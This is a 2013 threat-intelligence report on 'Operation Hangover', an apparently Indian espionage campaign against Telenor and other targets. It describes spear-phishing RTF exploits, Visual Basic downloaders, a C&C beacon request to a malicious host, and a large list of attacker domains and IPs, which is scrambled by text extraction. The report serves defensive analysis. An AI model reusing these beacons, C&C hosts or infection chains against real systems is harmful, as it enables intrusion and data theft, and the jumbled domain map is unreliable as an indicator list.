May 2013

OPERATION HANGOVER
Unveiling an Indian Cyberattack Infrastructure
Snorre Fagerland, Morten Kråkvik, and Jonathan Camp Norman Shark AS Ned Moran Shadowserver Foundation

Part of a PDF decoy from one of the malicious installers (md5 06e80767048f3edefc2dea301924346c).

Executive summary
In this report we detail a cyberattack infrastructure that appears to be Indian in origin. This infrastructure has been in operation for at least three years, more likely close to four years. The purpose of this framework seems predominantly to be a platform for surveillance against targets of national security interest (such as Pakistan), but we will also show how it has been used for industrial espionage against the Norwegian telecom corporation Telenor and other civilian corporations.

The name, “Operation Hangover”, was derived from the name of one of the most frequently used malwares. The project debug path is often visible inside executable files belonging to this family.

None of the information contained in the following report is intended to implicate any individual or entity, or suggest inappropriate activity by any individual or entity mentioned.

Operation Hangover: Unveiling an Indian Cyberattack Infrastructure

2

Background
On Sunday March 17th 2013 the Norwegian newspaper Aftenposten reported that the telecommunications giant Telenor had filed a case with Norwegian criminal police (“KRIPOS”) over what was perceived as an unlawful intrusion into their computer network. The infection was reported to have been conducted via “spear phishing” emails sent to people in the upper tiers of management. Initially, we had no information or visibility into this case. However, after some time Norwegian CERT (NorCERT) shared some data from the event, which included md5 hashes of malicious files and information about which Command and Control servers were used. However, the data we were given acted as a starting point for more data mining, and within a short period of time it became obvious that we were seeing a previously unknown and very extensive infrastructure for targeted attacks. This paper is the result of the ensuing investigation.

Timeframe
The samples we have uncovered seem to have been created from approximately September 2010 until the present day. It appears 2012 was a very active year for this group, which saw escalation not only in numbers of created malware files but also in targets. There is no sign that the attacks will slow down in 2013, as we see new attacks continuously.

Acknowledgments
We would like to thank NorCERT, the Norwegian National Security Authority, Telenor and Telenor SOC for their assistance and cooperation during the investigation of this case. We would also like to thank ESET for graciously sharing information they were in possession of, and finally we would like to express our gratitude to the people who created our database and analysis systems. These systems enable us to do the data correlation needed to find needles in haystacks, so their creators own a large part of this paper as well.

Operation Hangover: Unveiling an Indian Cyberattack Infrastructure

3

Terms used
C&C, C2, CC: Command- and Control server. Typically used about the computer the malware connects to in order to report status. Drop: The online location where malware delivers stolen information.

FUD: One meaning of this acronym is “Fear, Uncertainty and Doubt”, but in the malware underground FUD means Fully UnDetectable, i.e. the program is not detected by antivirus tools. MD5: A so-called hash – i.e. a number calculated on the basis of data that identifies these with high confidence. MD5’s in this paper are used to identify files. RTF: Rich Text Format, a document format

SFX: Self-extracting. Executable programs that are also archives, and which extract and sometimes execute the archive content when run. Sinkholing: A technique of re-registering a domain that has previously been used for malicious purposes. By doing this, machines that are still infected connect to our computer instead of the attacker’s, and we can log the connection attempts. Spear phishing: To send emails with malicious content (attachments, links, or fraudulent messages) to specific persons of particular interest. Zero day exploits: Program code to attack software vulnerabilities for which there is no patch.

Operation Hangover: Unveiling an Indian Cyberattack Infrastructure

4

doc”. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 5 . embedded code in the document will be run. However. and are actually specially crafted RTF files designed to trigger a software vulnerability (CVE-2012-0158) in Microsoft Common Controls. The initial spear phishing mail contained two files as attachments – a document named “220113. This was a selfextracting (SFX) ZIP archive that contained two files. When run. and an executable file “few important operational documents. some days after the attack we received MD5 hashes of the samples used. as shown below.exe” file and open the decoy document “legal operations.exe”. the installer will execute the included “conhosts.exe” is downloaded and executed by this mechanism.doc”and “220113.doc. We only found two of these samples in our own datasets. but we later directly received copies of most other samples connected with the case (Appendix A).doc”. This code is encrypted. “legal operations. but after decryption its real purpose becomes visible: The file “windwn.Telenor intrusion Initially we had no knowledge of the malware samples involved in the attack on Telenor. typically triggered in Microsoft Word.doc” also included in the mail are identical save for their size. If the vulnerability is triggered. (MD5 bd52237db47ba7515b2b7220ca64704e).

Windows NT 5.0.145) via HTTP on port 80.0C) Host: wreckmove.47. . down to individual username).04506. The following C&C domains/IP addresses were observed used in the attack: Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 6 .exe in Norman Malware Analyzer G2. file splitter tools.Fig. They connect to the Command and Control server wreckmove. and various other malware written in Visual Basic.org Connection: Keep-Alive Other samples found connected to the case were Delphi information stealers (some highly targeted. deflate User-Agent: Mozilla/4. The files conhosts. MSIE 7. The behaviour of windwn. C++ information stealers (keyloggers.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 HTTP/1.NET CLR 2.exe (MD5 02d6519b0330a34b72290845e7ed16ab) and windwn.648.exe (MD5 bfd2529e09932ac6ca18c3aaff55bd79) are both minimally obfuscated Visual Basic executables.21022. VBScript execution and data exfiltration is enough to trigger alerts. The persistence mechanism.50727.0.240.1. .NET CLR 3.NET4. . screen grabbers and file harvesters). using a peculiar and recognizable pattern: GET /flaws/snwd.0 (compatible.org (188. Trident/4.1 Accept: */* Accept-Encoding: gzip.5.0.0.NET CLR 3. .

biz enlighten-energy. This is an apparently legitimate Telenor draft written in 2002 using a Norwegian PowerPoint installation. The attackers also created the subdomain internet-security-suite-review.dll-getlogon-reason-0.wreckmove.zip.org researcherzone. md5 62b702a15a762692eda296b0aea270f9).formdir-1-curl-z2fowaz2f.167 gadgetscorner.no-cookieauth. The Telenor-related attack seems not to be over.zip.org. but the zip file contains both a real installer and a Visual Basic trojan identical to the one used against Telenor. The included trojan downloader connects this time back to the domain torqspot.biz/ 01084204_Telenor_New_Satellite_Client_Agreement_30032013. On this site there’s what appears to be an installer for the Bitdefender antivirus product (bitdefender_tsecurity. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 7 .188.infocardiology. though the decoy document is this time a Powerpoint presentation.org Telenor epilogue On the 3rd of April the attackers created another attack package and placed it on the URL http://mail.toptenreviews.biz.com.infocardiology.ppt”.telenor.237.net 151. “01084204_Telenor_New_Satellite_Client_Agreement_30032013.org infocardiology.com site. a spoof of the real toptenreviews. The package is quite similar to the first.

Case expansion through related files The behaviour pattern and the file structure of known files made it possible to search internal and public databases for similar cases. The large amount of new malware being created makes it infeasible to conduct malware-related investigations of any scale without strong database support. and it became clear that the Telenor intrusion was not a single attack but part of a continuous effort to attack and compromise governments and corporations around the world. The amount of malware we found through this was surprisingly large. we preserve the behavioural information of all files processed by our internal bank of Norman MAG2 automatic analysis systems. the particular VB script execution. There are also several public and commercial databases available for additional data mining. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 8 . and Google is invaluable. Searching internal databases for behavioural similarities: In this case. but there’s a wealth of attributes we can cluster by. In our case.

While investigating the extra cases we identified. The data contained in these folders were mainly connection logs. Some of these executables were digitally signed with a certificate which was revoked in 2011: Technical and Commercial Consulting Pvt. An important find we did on these servers were additional malicious executables. we accidentally discovered that a number of their C&C servers contained world readable folders. keylogs and other uploaded data from computers affected with malware. probably meant to be served to infected users. We were able to navigate into these and secure the data stored there. Ltd. Many of the collected logs were from automated analysis systems belonging to security companies. VeriSign Class 3 Code Signing 2010 CA Serial number: 4bf1d68e926e2dd8966008c44f95ea1c Revoked Nov 24th 2011 Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 9 . but not all.

Searching our certificate databases we found a large number of other executables similarly signed. Certificate database hits Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 10 . none of which were found to be innocent applications.

ns1. This is done almost to perfection.net.236. hotbookspot.24.txt set to “disallow” to stop them from being crawled. by searching historical IP data for the IP addresses of domains known to be involved we found a number of other domains likely belonging to the same infrastructure.24.. sinkholes and webhosting servers. These domains were then further verified against malware samples to ascertain valid connection to attackers.com. the domains registered by the attackers are “privacy protected”. Source: DomainTools . for example.236.254 173.org.24.info. f00dlover.24. domain parking IP addresses.236. Another feature is that almost all websites belonging to this attacker has their robots. ..254 A selection of passive DNS data on just one of the known IP addresses which was known to have served malware (1) Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 11 . khalistancalling.Case expansion through domain usage and registrations In almost all cases.254 173. This means that the registrant has paid the domain registrar to withhold identity information related to the registration. IP history on researcherzone.info.236. However.net. as there are possibilities of false correlations on.24.24.zerodayexploits.com.254 173.24.254 173.236. Some care needs to be taken when working with IP addresses.254 173.254 173.com. gamezoneall.236. rigidphotography.236. researcherzone. A A A A A A A 173.

Escape character is '^]'. 23 Mar 2013 16:44:44 -0400 enlighten-energy. 220 server. All of this enabled us to draw a domain map over the infrastructure (next page).net (used by malware MD5 a7b5fce4390629f1756eb25901dbe105) resolved to the IP address 37.59. Conversely. and many domains we have not found yet.161 587 Trying 37. many of the domains plotted were used in attacks years ago and may never be again.80. there might be domains owned by the attackers that are not plotted on this map because we could not prove they were malicious.59.Additional data may be gleaned by querying the IP addresses themselves. This map is probably larger than shown here.59.231. the domain onlinestoreapp.161.231. which responds with a configured banner.59. and this happens when connecting to that IP on ESMTP: $ telnet 37.161. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 12 . Many have set up a default ESMTP (mail) server on port 587/tcp..org ESMTP Exim 4. Connected to 37.enlighten-energy.1 Sat.231.161.231. For example..org is another of the known bad domains used against Telenor.

36.org 46.net ftp.mjtag.net ns1.178 79.com 94.com l0gin.info linxauth.sportswomen.net 213.118 ASN 75.78 37.org privatemoneyblog.com chroniclesupport.shopertock.osonline.com 94.24 213.u-01.continuelogs.5.59 shopping-hub12.org analysishunter.org re-buke.info ns2.com scrm-ail.com 184.78.stretcherservices.com ritualpoint.org avandtotalsecurity.net undertaker.download.161.yandex.com islamic-teacher.9 37.53 178.49.net ns1.stevens.screename.145.125 176.net omg-pics.net shopingcard.67.com nvidiaupdate.naclpro.240.64.config.196 178.oriontelekom.126 ASN 39743 VOXILITY 37.logserv.net ns2.net 141.c0m.com programmersheavengroup.net zolipas.juno.33.org ns1.39.go0gle.236 109.31.68 maxtourguide.235.51.43.188 109.249.32.59.80 79.com 178.gxongame.continuelogs.google.235 109.info groupskm.org 37.info ns1.wearwellgarments.187.org ns2.115.info server721-hans.154.154.36.254 f00dlover.153 mailoff.64.com ns1.org 46.net openhostingtalk.eu inforguide.data.81.eu 176.contiinue-2fsiignin3factiion.85 216.view.254.161.46.biz securedmx.org smurfprotection.info www.166.org ns2.53.79.51 divinepower.235.com ASN 19844 ns2.com.240.org ns1.braninfall.shoperstock.203.39.79 37.com ns2.facebook.142.193 ns2.serviceaccountloginservicemail.continuelogs.oriontelekom.39.243.com.59.analogwiz.net 213.203.accountsserviceloginservice.forest-fire.exchweb.65.160 188.236.accountsserviceloginservice.woline.130 37.com-uas.162.242 sochglobal.info ns1.net ns2.info.biz 37.org mobiletechspa.170.com srccail.142.99 deltadegger.org ns2.avandtotalsecurity.com 24940 HETZNER centstat.241.biz mail-attachment.64.webmail.org filesconnect.org 89.208.com ns1.61.site11.com 37.info ASN 36352 COLOCROSSING ASN 17054 CONTINENTAL ASN 10487 SIMPLENET ASN 14627 ASVITAL 216.75 5.31.75.influxlog.chronicleserv.154.org 37.233.com 176.activetalk.houseofjoyltd.net 178.org 89.facebook.99 79.folderid.ebox.47 ftp.accountsserviceloginservicemaileng.accountsserviceloginservice.facebook.45.org mujahidtarana.204.net reliable-global.com-config-verify2.46.biz visordan.info 46.org hotupdates.net ns1.org www.100 75.net ftp.telenor.dll-getlogon-reason-0.211.64.com ezyvalue.bin.75.65.249.org voip-e.blogspot.187.88 a.103 199.org opnsrc.50 ASN 16276 OVH 176.php.info ns1. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 13 .alr3ady.61 37.wearwellgarments.net 176.com.131.org ASN 57972 WEBEXXPURTS www.info www.166.166.produkte.188.com redgolfclub.braninfall.com.continuelogs.28 213.mjtag.org ns1.com footwallfanclub.com 31.78.235.infocardiology.198 enlighten-energy.40 184.80.org ftp.235.net pics-bucket.166.stretcherservices.85 46.net cppblog.y0utube.info accounts.sockzon.197 178.16 94.eu docsforum.net (MANTRA TECH) crvhostia.securedocx.202 94.250 ns2.srccail.142.203 94.com s0pp0rtdesk.221.181 199.31 taraanasongs.com ASN 47583 HOSTINGER serviceaccountloginservicemail.org stretcherservices.org continuelogs.com my.login-submit.session-full.58 customerpbr.info crowcatcher.eu ezservicecenter.com wagonact.php.infocardiology.107.net 188.com ftp.33.net ns1.evitalcare.org callersview.com hostmypc.competitveedge.info www.43 94.168 78.org competitveedge.com ns2.org ASN 32613 IWEB-AS ASN 30496 COLO4 mymyntra.251 173.49 tow3r.org evitalcare.info cabcardinc.75.knowledgepower.oscarneves.login-3a5077708027557787984-csrftoken.alintiqad-newsonline.net digitooldeals.com frameworkup.5755maild0aa.140 ASN 32475 SINGLEHOP 173.org ns2.mjtag.154.net infoteller.210.info www.insing.s3rv1c3s.31.7 ENRC-targeted malware calling4you.net 199.chiccounty.233 martcas.com bkltmc.166.com www.org ezxen.info login.servwh.31.com 5.com.com gauzpie.activetalk.org dosendit.net appinsecurity.com netmosol.199.mail.com 79.info www.31.55.187.127.216 msfileshare.3.166.info workinglab.100 109.org mailservicesupport.119.102.97 79.com.com-confg.25 69.39.com ASN 19066 WIREDTREE ns1.56 filesforum.105.co.212.ru.127.info ns1.com spidercom.info shopingcenter.info www.org cpbatch.chronicleserv.169.31.info webmail.database.net 176.aol.info easyhost-ing.com 79.org ns1.204.71.62.24.143.142.com ns1.net ns1.info pizzapalace.142.org tulip.org secureplanning.221.com ns2.c0m.60 ASN 151.235.org webmailaccountservicemail.com.info mailtechsolutions.127.live.181 nitr0rac3.infocardiology.kungfu-panda.info google.info login.no-ip.65.49 178.net 173.supersolus.com ftp.info sports-interaction.33.rs.info ASN 40034 CONFLUENCE www.us net4speed.net host-stuff.net16.119.net fapize.com ns1.75.login.authserv.info idsconline.151 109.digitalapp.107 79.154.95.net ns2.239.4.com starshome.accountsserviceloginservice.3.thedailynewsheadline.185.com 37.31.org www.authenticateservicemail.38 ns1.46.net foxypredators.142.182.com ASN 29550 SIMPLYTRANSIT systemcrack.org wizcheck.coolservice.8.net ns1.org ns1.com ns1.info 79.info ns1.autthserv. but are interesting in this context.20 easyslidesharing.accountsserviceloginservice.sportswomen.235.166.49.net slamburger.org secure-copy.nvidiaupdate.104.74 5.net denismoble.com cryptoanalysis.buildyourinfo.75 ASN 40676 PSYCHZ smclog.org spstack.82.f00dlover.org wizsplit.32.accountsserviceloginservice.mexchange.com infocardiology.142.com 79.152 ASN 49544 INTERACTIVE3D 89.33.aol.accountsserviceloginservice.86.20121206125116.com.devilreturns.com.info accounts.enetebookstore.214.214.235 192.com.39.com-serviicelogiin.65.faceb0ok.79.41 188.org hifisure.230 kungfu-panda.net.54 trend-mico.org 46.46.64.biz skylarzone.168 ns1.hackerscouncil.179 188.info plus.200.de.info www.info ns1.info hotbookspot.com www.218 ASN 31147 INLINE-AS 95.net go-jobs.128 Bumi PLC intrusion sh3llypunk.50.78.58 5.191 109.64.foxypredators.45.127.142.182.s0pp0rtdesk.accountsserviceloginservice.81.accountsserviceloginservice.142.doc-files.account.kungfu-panda.115 31.241.wvsolution.org 178.info www.135.info ftp.28.net ASN 47869 NETROUTING mpale.78.33.194 momate.com bmcmail.de.com alreadytrue.mobilesoftwaremanagement.27 213.81.woline.154.sockzon.com.matrixfanclub.my.2messageid.42.34 server006.info ns1.info supportanswer.55 applehostpoint.com r3gistration.221.221.com CME phishing attempt hangoutgroups.251 75.210.172 46.host-stuff.235.org researchwork.s0pp0rtdesk.owalogon.7 worldtourismnews.com woline.continuelogs.ymail.142.net callvoipnow.56 5.com systoolsonline.3.31.192 178.pl you-post.90 75.79.il.info 173.142.71.org trustworthyinfo.128 ns2.info vkspoke.236.comaccountsserviceloginservicemail2.adobesoftwareupdates.44 184.info www.net 78.info www.182.34.207.221.49.177 79.170.39.198.net ftp.80.net myfilestuff.org jerrycoper.net ns2.net 74.net kyzosune.com whostmrage.com clienttreasury.78.70 188.ctswebup.181 79.org chkpoint.com-l0giin.com.215.0-attachment.esbasis.info easternsoft.serviceaccountloginservicemail.toptenreviews.net packetwarden.127.net fasttrackagent. Green nodes are domains that are not part of any attack pattern.154.48.nsserver.com ns2.3.org servetools.112 follow-ship.com onlinestoreapp.102.mail.167 176.202.services.net 109.com advnotifier.142.srccail.accountsserviceloginservice.foxypredators.34 evolvingdesk.51.246 file-easy.inforguide.secure.31.net ns1.80 109.119.net random123.php.net 72.49.83 softservices.org rackitupstorenew.215.com devilreturns.speedaccelator.109 79.5.net fileshreader.com shoperstock.accountsserviceloginservice.2.119.154.233.205 ozonerim.net tmkstore.accountsserviceloginservice.org approvalclub.75.speedaccelator.8.net fonografia.142.info researcherzone.231.parrotcatcher.117.170 saboresnativos.biz sportswomen.49.de-nservers.ezyvalue.203.naclpro.hotbookspot.continuelogs.com-account-login-token.net Above: Domain map of the attack infrastructure.continuelogs.com currentnewsstore.com sendsh33p.info mail.info www.microsoft.brandsons.com 31.77 megafairclub.135.org shoppingspawn.129 bbupdate.info racmania.11 l0gin.144 94.97.33.info rghsv.bezeqint.net linkspectra.com ASN 21788 NOC ASN 197043 WEBTRAFFIC parrotcatcher.129 pfv6jyg1rdo9ptku.secuina.info gxongame.net ns1.mymail.com ns2.org ymadmin.services.4.net help-e.199 mozarting.us knight-quest.187 ASN 29073 ECATEL ASN 16265 LEASEWEB 65.31.46.forest-fire.analysishunter.sendsh33p.148.info mymail.info secure.250 ns2.248.racrage.com vall3y.org influxlog.188.net unisafeservice.net ns2.net megamediafile.net filetrusty.4.org 5.48 37.net connectopen.us-idtmpl.127.59.accountservice.newamazingfacts.net activetalk.127.org synergyrealsolutions.info nexterchk.go-jobs.com analogwiz.org mobilessoft.info heavenaffiliates.org n00b4u.org mail.accountsserviceloginservice.biz picasa-album.net 5.info www.alreadytrue.105.114.com ns1.24.sockzon.serviceaccountloginservicemail.xmailserv.61 viewerstalk.org tradeobjective.parrotcatcher.64.47 supertechnoclub.117.com serviceagent.65.competitveedge.info ns2.info ASN 58272 LEADERTELECOMBV 141.metacafe.com.continuelogs.programmersheavengroup.org lifelogs.net forest-fire.net.41 bluebird-restaurant.mstl0giintocpassiive-trrue.org mail.com 176.net fistoffury.167 88.111 79.49.com 40244 TURNKEY ns1.com oliveglobals.42.142.org bbc-news.3.203.129 hardwaregeeks.65.24.com zeusagency.175.continuelogs.51 178.77 opendocxsupport.login.148.33.98 ns1.71.195 dexlab.241.com.204 ASN 57858 FIBERGRID viragenonline.serviceaccountloginservicemail.39.102.76 79.org mail.110.org webjavaupdate.net ftp.aol.com ns1.net 37.info joyfulhalloween.20 213.contiinue-2fsiignin3factiion.biz xylotech.dataconnects.vlogserv.org 89.48 ns2.istpumpenunddosiertechnik.127.you-tube.net autowidge.srccail.46.matrixtriology.info opensourceforum.com-attachments.161.net ns1.ezservicecenter.236.net cr3ator01.net tollmart.org blogpublication.net 173.forest-fire.solraise.182.36.t-online.45.gxongame.org espressoday.102 199.org addoup.info mexchange.org mjtag.com internet-security-suite-review.net jasminjorden.120 79.31.70 herbco.142.serviceaccountloginservicemail.net hangovergroup.53.maxtourguide.net secure-solution.f00dlover.info www.info accounts.maxtourguide.com.info 8.zonrow.org store-fb.org logstat.ozoneparty.32.60 ns1.43.accountsserviceloginservice.182.global-internet.org torqspot.info acc0unts.evitalcare.net outgateway.net servorder.com-l0gin.comaccountsserviceloginservicemail2.102.215 94.net softmini.62. Yellow and orange nodes constitute domains.31.co.49 smackdownfanclub.236.handle.zonalship.evitalcare.info ns1.net secuina.com c0mpany4u.207.169.net wolfensteinx.78.com.sockzon.net ns2.102.fonografia.111 31.135.org ns1.adobe.142.serviceaccountloginservicemail.org ns2.eu 66.32 79.49 ns1.79.33.net 213.esbasis.net coolhostingwebspace.net 88.accountsserviceloginservice.org global-internet.com.50.info login.info sonificaton.programmersheavengroup.81 newamazingfacts.110 facebook.36.eu 37.net i-dim.infocardiology.info www.75.50.33.com keepawayfromfire.net addon-updates.info ns1.31 213.facbook.org www.32.org 46.106 mobileappsupport.info accounts.net mobiappword.54 184.org hycoxcable.91.org 46.53.143.185.toptenreviews.com 31.46.org 79.org matewiz.net piegauz.ymail.146 173.com 213.r3gistration.softmini.com serverrr.zerodayexploits.105.236.87 mcosine.33.org motsoul.49.57 ns1.ndi3n6rrgwnuefhoqwxgxdxmampattachmentid.147 109.no-cookieauth.info GORACK zerodayexploits.org novelseller.23.zerodayexploits.235.org wondersofworld.comeze.net test.myorderbox.49.195 178.23 google.3.matrixfanclub.158 109.78.36.info ns2.newamazingfacts.91.pajerolive.159.net 173.163 starcrunch.continuelogs.com 213.net 184.51.org picasa-album.214.142.155.166.rediff.org ns1.eu wearwellgarments.document.223 server003.71.org mosglobe.51.host-stuff.com supersolus.26 adminassistance.org my.org enetebookstore.143.info ns2.117.gxongame.212.net ftp.30.enetebookstore.47.org ns2.152 accounts.info www.com config-login.pajerolive.8 mail.124 rockingdevil.org ns1.info armordesigns.braninfall.235.com-account-login-token.infocardiology.mlogin.130 176.net 78.148.org ns1.net ASN 57172 GLOBALLAYER web-mail-services.org ns1.screenname.g00gle.com 96.187.infocardiology.org 173.161 5.11.m.go-jobs.org worksmartplay.com.22.50.link-live.249.com.36.org buildyourinfo.135.mailcache.info Porsche-targeted malware ns1.carmel.net ns2.142.org livesunshine.221.net brandsons.161.5.org mobiltechsoft.net thedailynewsheadline.104.siignin3dtrrue26featture3dprromo.org ns2.43 ns2.info we-tour.154.182.com starmobnetservice.39.221.225.com 176.71.99 ASN 20495 WEDARE deltaairlines.srccail.net 79.com.37 worldcitycenter.com ns2.brandsons.120.183 osservices.net ns1.info 89.auth.login.4.135.google.org internet-security-suite-review.co.org ns2.237.64.evitalcare.net casinoaffiliatepartners.f ormdir-1-curl-z2fowaz2f.net downfilesup.5.org linked-in.235.updates.org amaxgrp.142.edu.26.79.org geonet.com.117 31.serialxbox.52 178.info ns2.33.go0gle.biz esnucleus.net ns2.147 hangoutshop.193 109.knowledgepower.22.asp.235.109 109.dmzone.mailcache.org news-report.com 178.4. where the orange have been verified malicious and yellow are likely malicious.com worldread.31.espressoday.76 37.org chiccounty.web.org 79.65.51 176.166.142.233.net mailexservices.org ns1.org servicesonlinesupportinfo.113 31.net cobrapub.org 109.biz ns1.info shopertock.kjmailserv.com devinmartin.201 94.3.foxypredators.net ns2.org ns1.64.eu autowid.com filesassociate.com ns2.119 educatediary.86 199.com speedaccelator.org www.joymailserver.hotbookspot.217 95.71.org 188.net mailcache.org mozilaupdate.info 31.woline.65.127 ns1.39 ASN 39756 ROHOSTWAY ASN 14361 HOPONE periodtable.sso.yahoo.47.mailcache.info itechtoys.5.24s.27 188.49.com.com ns2.com google.net serviaccive.111.72 shopie.254.61 liveupdatesonline.comaccountsserviceloginservicemailen.com khalistancalling.com ns1.187.com alr3ady.info digitalapp.com.supersolus.235.com rigidphotography.243 74.com.49.sockzon.com 79.83 79.30 178.shopertock.accountsserviceloginservice.111.101 79.yutube.33.accountsserviceloginservice. and purple are autonomous systems (AS).166.78 178.85.org 95.245 216.net ns2.de.info hintover.email.75.net login.com.mailcache.net ns1.com.182.srccail.185.86 199.154.85.139 89.57 5.129.72 innovatorspool.86.198.194 178.info anoniemvolmacht.com.accountsserviceloginservice.siignin26nl-en.com ftp.166 176.de.org ns2.net 173.51.digitalapp.net ASN 20860 IOSMART 95.166.org sockzon.com.50 onlinewebmail.101.221.net 209.142.luckltd.154.com 173.221.42 myvoipp0wer.net tourtime.info opendocs.233.56 bikefanclub.net appworldblackberry.com 176.srcm-ail.79 79.32.142.39.249.accountsservicelogin.142.com.com ns1.3.203.78.165.81.110 com-mailservice.31.com l0gin.net share-home.com.235.info login.info linkedin.net vstrend.org ns2.net ns1.254 109. Red nodes show connections to known or likely attacks.gxongame.info youtube.170.80.net joymailserver.hackerscouncil.75.info www.org spiritlog.info www.49.com.com 216.24.org vkverbal.249.de.166.net leicesterhigh.net cablecomsolutions.165.info sped0m00d.flash.info mail.accountsservicelogin.114 31.154.60 onestop-shops.org.com ns2.info www.71.live.usercontent.org mailssh.siignin3dtrrue26featture3dprromo.ymail.58 178.net newsgroupupdate.comcast.thedailynewsheadline.pickmail.69.net pharmamkting.64.youtube.net4speed.36 pajerolive.165 178.org ns1.com cloudone-opsource.eu mildstone.info cellgame.127 wakeupindian.46.131.org infraswap.com 31.net 178.64.srccail.info makecmag.33.org naclpro.info google.webmail-login.info softwaresupdates.203.49.49.143 16626 GNAXNET 95.com.servicel0gin.info youtube.76 5.accountsserviceloginservice.org ns1.com ftp.32.org lynberrg.31.241.148 109.104.102.53 mobilemyown.net www.com hycoxweb.bezeqint.info www.info endemol.120 elementspro.org ns2.64.ezyvalue.5.105.net s3rv1c3s.info ns1.117.info account.221.com avatarfanclub.srccail.info gnuvisor.org ns1.info m.235.org searchports.com neverforget1984.info www.235.78.accountsserviceloginservice.com 173.24.com shreadersupport.24.217.220 ASN 51430 ALTUSHOST 188.handle.org primaaltus.140.siignin26nl-en.142.154.207.org 94.104.78.46.info ns1.142.acount.44.net ritownship.166.5.mailcache.32.55 researchhunter.120.com ns1.com.zoninfo.src-ym.169.68.continuelogs.c0m.com.org ASN 21844 THEPLANET 174.78.208 zonalon.157 109.18 h3helnsupp0ort.screenname.145 ASN heritage-society.de.180 testerspoint.42.100 199.org downdossiersup.137 securingyourself.164 bluecreams.107 8.metacafe.evitalcare.us.134 94.accountsserviceloginservice.org 37.207.org linkedin.alreadytrue.info ns1.org ns1.235.server721.info global-blog.han.com 176.242.com mgclog.136 31.info mktserv.co.org codetesters.61 89.103 signaturedz.235.113.45.com cupzon.65.97.129.64.102.net braninfall.com ns1.154.kungfu-panda.org workspacecz.net cmegroups.com.80.info mobilesoftwaremanagement.org mail.web-mail-services.abhedya.net gamezoneall.org fiservtech.info ns1.com cheetah4u.continuelogs.net new-agency.236.49.ezservicecenter.org 89.com extrememachine.info ns2.supersolus.154.info m.org Telenor intrusion support-tech.187.org ns2.0-rms-6.154.net mobileappworld.153 31.info fuzzyfile.sendsh33p.eu mysharpens.20 188.net clamerword.uk.sesion.237.com 173.com ns1.org 91.info downtimesupport.com ns2.204.il.mxsvr.136 89.235.105 184.cytanet.56 176.accountsservicelogin.org imagebar.net crestboard.info ns2.org wedzon.com fitnessapproval.com mobnetserver.net add-on-update.wildenstein.pl www.org zendossier.login.org gadgetscorner.2.info ns1.com.chronicleserv.142.matrixfanclub.yahoo.94 37.com.com-callgate-6.45.5.info zonalsky.com 37.194 178.com crystalrepo.line-web.info ns1.verify.net macsol.46.78.accountsserviceloginservice.com.224.yaho0.us-idtmpl.102.net matrixfanclub.org.org starsoel.182.24 google.224.193 178.mstl0giintocpassiive-trrue.180.org traderspace.net cmxgrp.221.influxlog.info 31.116 79.com msoftweb.com 46.224.eu secure-s.51.214.221.45.rs.127.5.com 37.net fb-time.accountsserviceloginservicemail.65.org ns1.info 109.net nlsec.233.sso.183 79.mail.36 37.enciris.152 109.com systemupd.net service-secure.com 141.239 ASN 22489 CASTLE-ACCESS 69.adminassistance.127.org ns1.49.51 109.ymail.221.info 37.15 37.5.64.info ns1.il.mail.directionmico.web-mail-services.252 173.info 176.com ns2.justdialforu.continuelogs.24.net webmicrosoftupdate.acc0unts.org get.com.com ns1.102 79.net 46.49.org csfserver.currentnewsstore.net 64. Blue nodes are IP addresses.145 wreckmove.71.

This time it was implemented as a script in the main web page of the domain you-post. its subdomain get.biz.getmedia.org. 00978e4b81ac577f328d6add75d0890e.us.net contains an active Java exploit (CVE-2012-0422) which attempts to install the same trojan as the IE exploit above. In the Telenor case.softmini. but unusual for this group to use.infocardiology. The shellcode contains a date check. also the domain used by two of the three documents mentioned above. The exploit is this time CVE2012-4792. The executables downloaded have usually themselves been downloaders. the date was February 16th 2013.site11. and autowidge. As far as we can tell they are only using known vulnerabilities. running processes) to a PHP script residing on the website random123. Downloads and executes an executable from remote sites.com.net. The actual document is binary very similar to other documents (51ee31f234db61b488647915f8d7d4c8. Documents The first exploit we observed was included in the RTF files used in the Telenor attack. The exploit in question was CVE-2012-0158.) which have been used in other targeted attacks by these threat actors. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 14 .adobe. a well-known backdoor trojan. When it triggers it downloads and runs a malicious executable from the domain softmini. this is rarely done by this attack group. 17a31d1075ebce41ba48a9efacb79d28. www. an Internet Explorer vulnerability.net.Exploits Whereas other targeted attack actors often rely extensively on the use of software exploits to plant their malware.flash. www. and in the most recent variations the timeout date is set to May 21nd 2013. • Web When we investigated the attacker domain structure we found more exploit code. ID.net.technopenta. www. timezone. In a couple of cases we have observed final payload to be Dark Comet.org used for this. Softmini. If the exploit is triggered before the timeout date the shellcode does two different things: • • Posts system info (machinename... We have seen softmini. a very common vulnerability to exploit. which means it will stop working after a certain date.net seems to be a hub for exploitcode. no zero day attacks.

a large family of Visual Basic downloaders which for the most part seem to be written by a person calling himself “Yash” or “Yashu”. Operation Hangover: Unveiling an Indian Cyberattack Infrastructure 15 .The Smackdown downloaders Most of the first stage malware we’ve seen used in attacks are variants of Smackdown. Different text obfuscations in a Smackdown “miNaPro” downloader. Typically the trojan begins by uploading system information to a PHP script on the C&C server. The attacker can decide separately which infected machine should receive additional malware. These have evolved over time and are using different levels of obfuscation on text strings. Reversed strings. The second stage malware is usually Hanove but other malware families are also used. character code encoding and inserting garbage ‘%’ characters.

